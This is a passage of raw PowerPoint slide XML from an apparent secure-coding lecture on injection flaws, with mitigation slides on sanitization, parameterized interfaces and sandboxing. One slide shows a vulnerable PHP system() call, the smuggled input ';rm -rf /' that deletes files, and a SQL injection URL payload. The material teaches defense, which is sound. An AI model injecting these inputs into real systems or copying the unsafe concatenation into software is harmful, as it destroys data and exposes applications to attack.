              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>OS Command Injection in C:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>// Build a command string via input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Issue: Data and control traverse same path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0A048E-9EF7-413F-929B-1ABF9E0C5910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="1981200"/>
            <a:ext cx="4800600" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PHP OS Command Injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Obtain user name; meant to display directory:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> = $_POST["user"];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>$command = 'ls -l /home/’ . $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>system($command);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Input instead of command name:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>;rm -rf /</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Result: Removed files recursively</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22532" name="Picture 18" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2735DA9-2E46-4055-92AD-6D20E62901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2700" y="596376"/>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19" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF4E1660-CE7E-4F50-8780-7CE865C984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77100" y="577521"/>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4" name="Picture 20" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A74505E0-CD00-4A0E-890C-C9C3245D24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1500" y="558666"/>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081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F7CAF804-EE51-406D-8D6D-3B4A6357FD42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Other Injection Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEC799E2-82C8-43B6-AECE-23F9935005F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Other Injections: NoSQL, PHP, LDAP, URL, XML parsers, SMTP headers, expression languages, and object mapping queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/accountView?id=' or '1'='1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="686974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5086C7A9-17C1-41AD-B2D6-CE19117C9AD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="8229600" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Injection Fix:  Input Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67ADD07F-6A4D-4F9C-9110-CE868A50C5FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1981200"/>
            <a:ext cx="4648199" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Sanitize input:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Disallow meta-characters in input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use a parameterized Interface </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use an safe API or Object Relational Mapping Tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use positive input validation at server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Avoid user-supplied inserted text or dynamically-constructed query strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use LIMIT SQL controls to limit the number of exposed records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Disallow the EXECUTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>IMMEDIATE or exec() command;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41735A0B-2D6A-4256-84D4-7C3C8A2C8B58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="5029200"/>
            <a:ext cx="3352800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8B8BFF"/>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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Persistence Layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C272D47C-7BCA-4A04-9AF6-F809FDB8A262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="6019800"/>
            <a:ext cx="1524000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/>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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19462" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45A80D81-99FB-4F53-9822-C186FBD125A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3886200"/>
            <a:ext cx="3352800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9B9FF"/>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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Business Logic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19463" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771BACCC-C3FC-4459-823F-8C30A165D9DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2743200"/>
            <a:ext cx="3352800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>GUI - Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19464" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E98D24-1F64-4B25-B340-DD4DEACB17AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3657600"/>
            <a:ext cx="0" cy="2286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5" name="Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5884BDE-BA2B-4445-82A4-B31452EB0759}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4724400"/>
            <a:ext cx="0" cy="3048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6" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88CCA703-247A-4306-95FB-187B4ACB5738}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="5791200"/>
            <a:ext cx="0" cy="2286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586590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8D3E1B7-D7F5-4296-93F9-B72E44A9CC58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="663574"/>
            <a:ext cx="8229600" cy="1165225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Control: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Avoid OS Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E564A6D4-EB92-43F3-AC66-5A5425C84022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="2209800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Separate control information from data information.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>E.g. where data-&gt; database, control defines application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use library calls instead of external processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Avoid external control of command input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Run code in “jail” or other sandbox environment (to restrict system access)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Provide lowest possible permissions for executable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="computr1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2640AB00-6EAE-403C-BCF6-DE88EDB4F777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4343400"/>
            <a:ext cx="1809750" cy="1809750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T1" fmla="*/ 0 h 21600"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T3" fmla="*/ 0 h 21600"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T5" fmla="*/ 0 h 21600"/>
              <a:gd name="T6" fmla="*/ 0 w 21600"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T8" fmla="*/ 0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2147483646 w 21600"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T24" fmla="*/ 0 w 21600"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T26" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T27" fmla="*/ 2147483646 h 216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4923 w 21600"/>
              <a:gd name="T43" fmla="*/ 2541 h 21600"/>
              <a:gd name="T44" fmla="*/ 16756 w 21600"/>
              <a:gd name="T45" fmla="*/ 11153 h 2160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9999FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24581" name="Picture 5" descr="BD18219_">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13E965AB-293F-4641-A1E9-B55BD3C77E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191000"/>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2" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
